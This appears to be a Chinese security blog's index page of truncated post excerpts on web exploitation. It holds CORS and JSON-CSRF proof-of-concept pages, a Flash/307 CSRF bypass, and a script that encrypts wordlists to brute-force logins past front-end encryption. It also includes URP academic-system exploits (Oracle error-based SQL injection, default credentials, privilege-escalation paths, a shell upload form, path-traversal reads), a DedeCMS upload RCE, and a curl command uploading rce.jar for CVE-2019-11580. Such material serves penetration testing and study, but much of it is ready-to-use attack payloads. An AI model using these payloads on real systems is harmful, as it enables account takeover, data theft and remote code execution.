Author:LSA

CORS进阶利用

//结合网络资料整理了CORS的进阶利用方式,基础利用参考浅谈sop、cors和csp   SOP可以发请求,但是浏览器会阻止响应 当”Access-Control-Allow-Origin“是动态产生,要用”Vary: Origin“指定。 这个头部字段向客户端表明,服务器端返回内容的将根据请求中”Origin“的值而变化。   1. ACAO为* Access-Control-Allow-Origin:* 注意Access-Control-Allow-Credentials:true和Access-Control-Allow-Origin:*不能同时使用!!! 这样配置浏览器将会报错 直接利用即可   2. ACAO为requester.com 后端代码例子: if ($_SERVER[‘HTTP_HOST’] == ‘*requester.com’) { //Access data else{ // unauthorized access} } 申请一个以requester.com结尾的域名放poc即可 or ^https?:\/\/.*\.?target\.local$ Origin: https://nottarget.local or Origin: https://target.local.attacker.domain   3. 白名单域名 if ($_SERVER[‘HTTP_HOST’] == ‘*.requester.com’) { //Access data else{ // unauthorized access} } 利用sub.requester.com的xss(或者子域名接管漏洞)漏洞攻击provider.com 案例: https://banques.redacted.com/choice-quiz?form_banque=”><script>function%20cors(){var%20xhttp=new%20XMLHttpRequest();xhttp.onreadystatechange=function(){if(this.status==200) alert(this.responseText);document.getElementById(“demo”).innerHTML=this.responseText}};xhttp.open(“GET”,”https://www.redacted.com/api/return”,true);xhttp.withCredentials=true;xhttp.send()}cors();</script>&form_cartes=73&iframestat=1   4. 反射origin add_header “Access-Control-Allow-Origin” $http_origin; add_header “Access-Control-Allow-Credentials” “true”;   5. 信任null Access-Control-Allow-Origin: null Access-Control-Allow-Credentials: true <iframe sandbox=”allow-scripts allow-top-navigation allow-forms” src=’data:text/html,<script>**CORS request here**</script>’></iframe>   5. 特殊字符 浏览器在发出请求之前并不总是验证域名。 因此,如果使用某些特殊字符,则浏览器当前可能会提交请求,而无需事先验证域名是否有效和存在。   特殊字符 Chrome(v 67.0.3396) Edge(v 41.16299.371) Firefox(v 61.0.1) Internet Explorer(v 11) Safari(v 11.1.1) ! NO NO NO NO YES = NO NO NO NO YES $ NO NO YES NO YES & NO NO NO NO YES ‘ NO NO NO NO YES ( NO NO NO NO YES ) NO NO NO NO YES * NO NO NO NO YES + NO NO YES NO YES , NO NO NO NO YES – YES NO YES YES YES ; NO NO NO NO YES = NO NO NO……

JSON型CSRF攻击方法

原始请求,存在CSRF漏洞 如果后端只是检查格式不检查header,可尝试 <html> <body> <script src=”jquery.min.js”></script> <form id=”myform” enctype=”text/plain” action=”https://xxx.com/apps/member/up_member_info” method=”POST”> <input id=”json” type=”hidden” name=’json’ value=’changenick”}’> </form> <script> $(document).ready(function() { $(“#json”).attr(“name”,'{“name”:”‘); $(“#myform”).submit(); }); </script> </body> </html> 增加ignore_me参数可去掉多出的等号: <form action=”https://xxxx.com/apps/member/up_member_info” method=”post” enctype=”text/plain”> <p>Last name: <input type=”text” name='{“name”:”changenick6″,”ignore_me”:”‘ value=’test”}’type=’hidden’></p> <input type=”submit” value=”Submit” /> </form> 或者把value置空: <html> <body> <script src=”jquery.min.js”></script> <form id=”myform” enctype=”text/plain” action=”https://xxx.com/apps/member/up_member_info” method=”POST”> <input id=”json” type=”hidden” name=’json’ value=”> </form> <script> $(document).ready(function() { $(“#json”).attr(“name”,'{“name”:”changenick”}’); $(“#myform”).submit(); }); </script> </body> </html> 利用fetch发请求: <html> <title>JSON CSRF POC</title> <body> <center> <h1> JSON CSRF POC </h1> <script> fetch(‘https://xxx.com/apps/member/up_member_info’;, {method: ‘POST’, credentials: ‘include’, headers: {‘Content-Type’: ‘text/plain’}, body: ‘{“username”:”test0001″}’}); </script> <form action=”#”> <input type=”button” value=”Submit” /> </form> </center> </body> </html>   利用xmlhttprequest发请求,要配合跨域漏洞 <html> <script language=”javascript” type=”text/javascript”> function jsonreq() { var xmlhttp = new XMLHttpRequest(); xmlhttp.open(“POST”,”https://xxx.com/apps/member/up_member_info”,true); xmlhttp.setRequestHeader(“Content-Type”,”application/json;charset=UTF-8″); xmlhttp.withCredentials = true xmlhttp.send(JSON.stringify({“name”:”changenick02″}));; } jsonreq(); </script> </html>       如果后端检查了header,尝试flash+307 Flash可以携带请求头和请求参数向重定向器(307)发出请求。 重定向器向目标页面发出CSRF攻击请求(携带请求头和请求参数,X-Requested-With:flash)。 Flash再向目标站请求crossdomain.xml,但是此前攻击请求已发出。 准备道具: 服务器,恶意flash文件,307页面文件,crossdomain.xml(可选) crossdomain.xml: <cross-domain-policy> <allow-access-from domain=”*” secure=”false”/> <allow-http-request-headers-from domain=”*” headers=”*” secure=”false”/> </cross-domain-policy> 用来允许flash向攻击者服务器请求307页面。 //如果flash文件和307页面在同一个域名下,就不需要crossdomain文件 重定向307的PHP文件: <?php // redirect automatically header(“Location: https://victim.com/user/endpoint/”;, true, 307); ?>   实战案例: 环境:win7+Chrome79.0.3945.79+flash32.0.0.303 没有csrf防御,但是为json格式 先利用普通的form响应500,表明后端可能检验了content-type头。 尝试使用xhr 发option预检请求 意料之内无法通过(除非有xss配合,xsrf!)   构造钓鱼页面(利用embed加载flash): <html> <head></head> <body> <embed height=”600″……

突破前端加密方法总结

0x00 执行加密的js文件写脚本生成加密字典 如 https://yyy.xxx.com/assets/des/des.js 对密码(123456)进行了前端加密传输。 这里还需要从页面源代码找到加密方法的参数 pip install PyExecJS 再安装PhantomJS(可选),或者用默认的js解析引擎也行。(execjs.get().name) 加密脚本:生成加密后的用户名和密码 #coding:utf-8 #from selenium import webdriver import execjs def mzDes(s,para): despara = execjs.get(‘phantomjs’).compile(s).call(“strEnc”,para,”csc”,”mz”,”2017″) return despara with open(‘des.js’,’r’) as mzCrypto: s = mzCrypto.read() with open(‘users.txt’,’r’) as users: #des username     with open(‘des_users.txt’,’w’) as f4DesUser:     user = users.readlines()     for u in user:     uname = u.strip()     print uname desUsername = mzDes(s,uname) print desUsername     f4DesUser.write(desUsername+’\n’) with open(‘pwdTop54.txt’,’r’) as pwds: #des password     with open(‘des_pwds.txt’,’w’) as f4DesPwd:     pwd = pwds.readlines()     for p in pwd:     passwd = p.strip()     print passwd     desPassword = mzDes(s,passwd)     print desPassword     f4DesPwd.write(desPassword+’\n’) 这样就可以利用burpsuite/python脚本加载加密后的字典愉快的爆破啦。 py脚本爆破(单线程): #coding:utf-8 #from selenium import webdriver import execjs import requests import re successCount = 0 def mzDes(s,para): despara = execjs.get().compile(s).call(“strEnc”,para,”csc”,”mz”,”2017″) return despara with open(‘des.js’,’r’) as mzCrypto: s = mzCrypto.read() with open(‘users.txt’,’r’) as users: #des username user = users.readlines() for u in user: with open(‘top50.txt’,’r’) as pwds: #des password     uname = u.strip()……

URP教务系统历史漏洞集合

主要参考wooyun 账号密码构成 教师 21071 21071 21072 21072   学生 2016517109 2016517109 2016046126 201604612 账号和密码相同,或密码身份证后6位或123456   1. SQL注入 <html> <form action=”http://xxx.edu.cn/servlet/com.runqian.report.input.UploadFile2DBServlet” method=”post” enctype=”multipart/form-data”> <label for=”file”>Filename:</label> <input type=”file” name=”file” id=”file” /> cachedId:<input type=”text” name=”update” value=”tbl=dual;keyValue=2;keyCol=1;updateValue=1;updateCol=1″> srcType:<input type=”text” name=”xh” value=”test”> <input type=”text” name=”processor” value=”com.runqian.report.input.AbstractProcessor”> <input type=”text” name=”backAndRefresh” value=”test”> <input type=”text” name=”webTableName” value=”test11″> <input type=”text” name=”importTo” value=”text”> <input type=”text” name=”params” value=”params”> <br /> <input type=”submit” name=”submit” value=”Submit” /> </form> </html> 随便上传一个文件,上传时抓包 update填tbl=dual;keyValue=2;keyCol=1;updateValue=1;updateCol=1 此时是因为keyCol=1,1这个列索引不存在 此处直接在tbl处注入,把后面的东西注释掉就好了 因为开启了oracle报错。 那就简单了。 报错注入下 以爆数据库名为例 update内容为 tbl=dual/**/where/**/1=to_char(dbms_xmlgen.getxml(‘select “‘||(select user from sys.dual)||’” from sys.dual’))–;keyValue=1;keyCol=1;updateValue=1;updateCol=1; 然后注入出一条数据为例 udpate内容为 tbl=dual/**/where/**/1=to_char(dbms_xmlgen.getxml(‘select “‘||(select xh||’#’||xm||’#’||xb from xs_xjb where rownum=1)||’” from sys.dual’))–;keyValue=1;keyCol=1;updateValue=1;updateCol=1;   2. 越权 1) 需登录 http://ip/jmglAction.do?oper=xsmdcx http://ip/gradeLnAllAction.do?type=ln&oper=qb&cjbh=学号   2) /cmenu/menu.jsp   访问后 reportIndex.jsp /index/tree.jsp /reportIndex.jsp 越权获取信息   3) 登录 fileUploadDownloadAction.do?actionType=1 越权删除他人文件改id 文件名xss   4) 登录 reportAction.do   5) 登录 /reportFiles/cj/cj_zwcjd.jsp   3. 任意文件上传 <form action=”http://x.x.x.x/lwUpLoad_action.jsp” method=”post” enctype=”multipart/form-data” > <input type=”file” name=”theFile” id=”File”/> <input type=”text” name=”xh” id=”context”/> <input type=”submit” value=”show me the shell” > </form>   4. 任意文件读取 com.runqian.report.view.html.GraphServlet?picFile=../../../../../../../../conf/resin.conf http://x.x.x.x/servlet/com.runqian.base.util.ReadJavaScriptServlet?file=../../../../../../../../conf/resin.conf

dedecms rce cve-2018-20129漏洞重现

一个鸡肋的老洞,具体分析见: https://www.anquanke.com/post/id/168458 https://xz.aliyun.com/t/1976 https://www.jianshu.com/p/b0eb694be4ac   大概原理: 管理员登录,会员功能开启,利用编辑器上传图片过滤不严,正则替换%,*,?等字符为空,可被利用绕过过滤(如zxc.jpg.p%hp,zxc.jpg?ph%p,zxc.jpg.p?hp) //据说要用构造图片马避免渲染失效,但是本人当时好像直接传常规图片马即可……   漏洞文件: select_images_post.php 关键代码: <?php /** * 图片选择 * * @version $Id: select_images_post.php 1 9:43 2010年7月8日Z tianya $ * @package DedeCMS.Dialog * @copyright Copyright (c) 2007 – 2010, DesDev, Inc. * @license http://help.dedecms.com/usersguide/license.html * @link http://www.dedecms.com */ require_once(dirname(__FILE__).”/config.php”); require_once(dirname(__FILE__).”/../image.func.php”); if(empty($activepath)) { $activepath =”; $activepath = str_replace(‘.’, ”, $activepath); $activepath = preg_replace(“#\/{1,}#”, ‘/’, $activepath); if(strlen($activepath) < strlen($cfg_image_dir)) { $activepath = $cfg_image_dir; } } if(empty($imgfile)) { $imgfile=”; } if(!is_uploaded_file($imgfile)) { ShowMsg(“你没有选择上传的文件!”.$imgfile, “-1”); exit(); } $CKEditorFuncNum = (isset($CKEditorFuncNum))? $CKEditorFuncNum : 1; $imgfile_name = trim(preg_replace(“#[ \r\n\t\*\%\\\/\?><\|\”:]{1,}#”, ”, $imgfile_name)); if(!preg_match(“#\.(“.$cfg_imgtype.”)#i”, $imgfile_name)) { ShowMsg(“你所上传的图片类型不在许可列表,请更改系统对扩展名限定的配置!”, “-1”); exit(); } $nowtme = time(); $sparr = Array(“image/pjpeg”, “image/jpeg”, “image/gif”, “image/png”, “image/xpng”, “image/wbmp”); $imgfile_type = strtolower(trim($imgfile_type)); if(!in_array($imgfile_type, $sparr)) { ShowMsg(“上传的图片格式错误,请使用JPEG、GIF、PNG、WBMP格式的其中一种!”,”-1″); exit(); } $mdir = MyDate($cfg_addon_savetype, $nowtme); if(!is_dir($cfg_basedir.$activepath.”/$mdir”)) { MkdirAll($cfg_basedir.$activepath.”/$mdir”,$cfg_dir_purview); CloseFtp(); } $filename_name = $cuserLogin->getUserID().’-‘.dd2char(MyDate(“ymdHis”, $nowtme).mt_rand(100,999)); $filename = $mdir.’/’.$filename_name; $fs = explode(‘.’, $imgfile_name); $filename = $filename.’.’.$fs[count($fs)-1]; $filename_name = $filename_name.’.’.$fs[count($fs)-1]; $fullfilename = $cfg_basedir.$activepath.”/”.$filename; move_uploaded_file($imgfile, $fullfilename) or die(“上传文件到 $fullfilename 失败!”); if($cfg_remote_site==’Y’ && $remoteuploads == 1) { //分析远程文件路径 $remotefile = str_replace(DEDEROOT, ”, $fullfilename); $localfile = ‘../..’.$remotefile; //创建远程文件夹……

ubuntu14安装MSF5

apt-get install somelibs apt-get install build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev openjdk-7-jre git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev zlib1g-dev apt-get install libxml2-dev libxslt1-dev vncviewer libyaml-dev ruby1.9.3 ruby-dev apt-get install svn apt-get install nmap apt-get install rvm apt-get install libpq-dev apt-get install build-essential patch ruby-dev zlib1g-dev liblzma-dev apt-get install openssl ruby-openssl libssl-dev rbenv install 2.6.2 rbenv global 2.6.2   su postgres createuser msf -P -S -R -D createdb -O msf msf   git clone git://github.com/sstephenson/rbenv.git .rbenv echo ‘export PATH=”$HOME/.rbenv/bin:$PATH”‘ >> ~/.bashrc echo ‘eval “$(rbenv init -)”‘ >> ~/.bashrc git clone git://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build echo ‘export PATH=”$HOME/.rbenv/plugins/ruby-build/bin:$PATH”‘ >> ~/.bashrc git clone git://github.com/dcarley/rbenv-sudo.git ~/.rbenv/plugins/rbenv-sudo   git clone https://github.com/rapid7/metasploit-framework.git cd metasploit-framework/ rvm –default use ruby-2.1.6@metasploit-framework cd metasploit-framework/ bash -c ‘for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done’ vim /opt/metasploit-framework/config/database.yml sh -c “echo export MSF_DATABASE_CONFIG=/opt/metasploit-framework/config/database.yml >> /etc/profile”   curl -# -o /tmp/armitage.tgz http://www.fastandeasyhacking.com/download/armitage150813.tgz tar -xvzf /tmp/armitage.tgz -C /opt ln -s /opt/armitage/armitage /usr/local/bin/armitage ln -s /opt/armitage/teamserver /usr/local/bin/teamserver sh -c “echo java -jar /opt/armitage/armitage.jar \$\* > /opt/armitage/armitage” perl -pi -e……

CSDN 存储型XSS分析

20190724,网上传出csdn貌似有存储型XSS,弹框链接: https://bbs.csdn.net/topics/390816889 解码是”提交成功” 搜索这个词 抓包判断该post包触发弹窗 尝试修改响应包 请求 https://bbs.csdn.net/topics/390816889 会发请求 GET /redisData/baiduLandingWord?url=https://bbs.csdn.net/topics/390816889&size=1 HTTP/1.1 Host: redisdatarecall.csdn.net Connection: close Accept: application/json, text/javascript, */*; q=0.01 Origin: https://bbs.csdn.net User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Referer: https://bbs.csdn.net/topics/390816889 Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 这个请求是在百度站内查询 再请求,将查询内容写入redis 再请求,返回了推荐的关联帖子的内容,内容(‘提交成功’)经过了html实体编码,引号还原了。(不确定……) 该返回造成弹窗。 触发流程: 1.发布帖子写入payload(如Response.Write(“<script>alert(‘提交成功!’);window.location.href=window.location.href;window.opener.location=window.opener.location;</script>”);) 2.百度搜索引擎爬到该payload帖子。 3.某相关话题帖子推荐到payload帖子,加载到某相关话题帖子的页面。 4.触发payload。   相关链接 https://redisdatarecall.csdn.net/redisData/baiduLandingWord?url=https://bbs.csdn.net/topics/390816889&size=1 https://event.csdn.net/logstores/csdn-pc-tracking-page-exposure/track https://zhannei-dm.csdn.net/recommend/baidu_zhannei_search?keyword=%E5%85%B3%E4%BA%8Ewindow.location.href%E7%9A%84xss https://recsidebar.csdn.net/getSideBarRecommend.html   不确定分析的对不对,如有错漏,强烈建议指出…….

Atlassian Crowd and Crowd Data Center RCE 漏洞重现(CVE-2019-11580)

201907,网上爆出Atlassian Crowd and Crowd Data Center RCE 漏洞,重现一下。     curl -k -H “Content-Type: multipart/mixed” \ –form “file_cdl=@rce.jar” http://10.10.20.166:8095/crowd/admin/uploadplugin.action Installed plugin /opt/atlassian/crowd/apache-tomcat/temp/plugindev-1059463178748466378rce.jar https://github.com/jas502n/CVE-2019-11580